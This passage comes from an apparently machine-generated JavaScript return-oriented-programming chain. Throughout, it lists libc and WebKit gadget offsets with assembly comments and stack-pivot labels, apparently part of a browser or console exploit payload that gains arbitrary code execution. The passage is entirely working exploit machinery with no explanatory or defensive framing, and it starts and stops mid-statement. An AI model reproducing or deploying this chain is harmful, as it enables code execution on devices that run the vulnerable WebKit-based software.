0]); // 0x0 set_gadgets([ ropchain+372256, //L7677+24 ropchain+372272, //L7672 libc_base+782311, //pop rsp ropchain+381368, //L7678 //L7672: libc_base+764760, //pop rsi ropchain+372312, //L7679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7679: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7681: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+372432, //L7684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+372416, //L7682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7682: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7684: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+372608, //L7687 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+372624, //L7688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+372576, //L7685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+372592, //L7686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7685: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7686: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7687: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7688: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+372704, //L7689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+372720, //L7690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7689: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7690: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+372816, //L7692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+372800, //L7691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7691: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7692: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+372896, //L7693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7693: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7694: db([116, 0]); // 0x74 set_gadget(libc_base+144605,); //pop rdi //L7695: db([116, 0]); // 0x74 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+373040, //L7696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+373072, //L7698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+373056, //L7697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7696: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7697: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7698: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+373240, //L7700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+373256, //L7701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+373224, //L7699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7699: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7700: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7701: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+373368, //L7703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+373416, //L7706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+373384, //L7704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7703: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7705: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7706: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+373528, //L7707+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+373520, //L7707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7707: db([0, 0]); // 0x0 set_gadgets([ ropchain+373544, //L7707+24 ropchain+373560, //L7702 libc_base+782311, //pop rsp ropchain+386584, //L7708 //L7702: libc_base+764760, //pop rsi ropchain+373600, //L7709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7709: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7711: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+373720, //L7714 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+373704, //L7712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7712: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7714: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+373896, //L7717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
libc_base+764760, //pop rsi ropchain+373912, //L7718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+373864, //L7715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+373880, //L7716 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7715: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7716: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7717: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7718: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+373992, //L7719 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+374008, //L7720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7719: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7720: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+374104, //L7722 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+374088, //L7721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7721: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7722: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+374184, //L7723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7723: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7724: db([106, 0]); // 0x6a set_gadget(libc_base+144605,); //pop rdi //L7725: db([106, 0]); // 0x6a set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+374328, //L7726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+374360, //L7728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+374344, //L7727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7726: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7727: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7728: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+374528, //L7730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+374544, //L7731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+374512, //L7729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7729: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7730: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7731: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+374656, //L7733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+374704, //L7736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+374672, //L7734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7733: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7734: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7735: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7736: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+374816, //L7737+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+374808, //L7737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7737: db([0, 0]); // 0x0 set_gadgets([ ropchain+374832, //L7737+24 ropchain+374848, //L7732 libc_base+782311, //pop rsp ropchain+388752, //L7738 //L7732: libc_base+764760, //pop rsi ropchain+374888, //L7739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7739: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7741: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+375008, //L7744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+374992, //L7742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7742: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7744: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+375184, //L7747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+375200, //L7748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+375152, //L7745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+375168, //L7746 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7745: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7746: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7747: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7748: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+375280, //L7749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+375296, //L7750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7749: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7750: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+375392, //L7752 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+375376, //L7751 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7751: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7752: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+375472, //L7753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7753: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7754: db([122, 0]); // 0x7a set_gadget(libc_base+144605,); //pop rdi //L7755: db([122, 0]); // 0x7a set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+375616, //L7756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+375648, //L7758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi 
ropchain+375632, //L7757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7756: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7757: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7758: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+375816, //L7760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+375832, //L7761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+375800, //L7759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7759: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7760: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7761: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+375944, //L7763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+375992, //L7766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+375960, //L7764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L7763: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7764: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7765: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7766: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+376104, //L7767+8 
libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+376096, //L7767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L7767: db([0, 0]); // 0x0 set_gadgets([ ropchain+376120, //L7767+24 ropchain+376136, //L7762 libc_base+782311, //pop rsp ropchain+390920, //L7768 //L7762: libc_base+782311, //pop rsp ropchain+393088, //L7769 //L7648: libc_base+764760, //pop rsi ropchain+376192, //L7770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7770: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7772: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+376312, //L7775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+376296, //L7773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7773: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7775: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+376488, //L7778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+376504, //L7779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+376456, //L7776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+376472, //L7777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7776: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7777: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7778: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7779: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+376600, //L7781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+376584, //L7780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L7780: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7781: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7782: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L7783: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L7784: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+376800, //L7786 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7786: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+376856, //L7787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7787: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+376992, //L7791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+376976, //L7790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L7789: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L7790: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7791: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+377056, //L7792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7792: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7794: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L7796: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+377216, //L7799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+377200, //L7797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7797: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7799: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+377360, //L7802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+377328, //L7800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+377344, //L7801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7800: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7801: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7802: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi 
ropchain+377448, //L7804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L7803: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L7804: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+377504, //L7805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7805: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7807: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+377584, //L7809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7809: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+377664, //L7810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L7810: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L7812: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+377784, //L7815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+377768, //L7813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L7813: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7815: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+377864, //L7816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+377880, //L7817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi 
]); //L7816: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7817: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+378040, //L7821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+378008, //L7819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+378024, //L7820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7818: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L7819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L7820: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7821: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+378096, //L7823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L7823: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+378224, //L7825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+378240, //L7826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+378208, //L7824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L7824: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L7825: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L7826: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+378400, //L7830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+378368, //L7828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, 
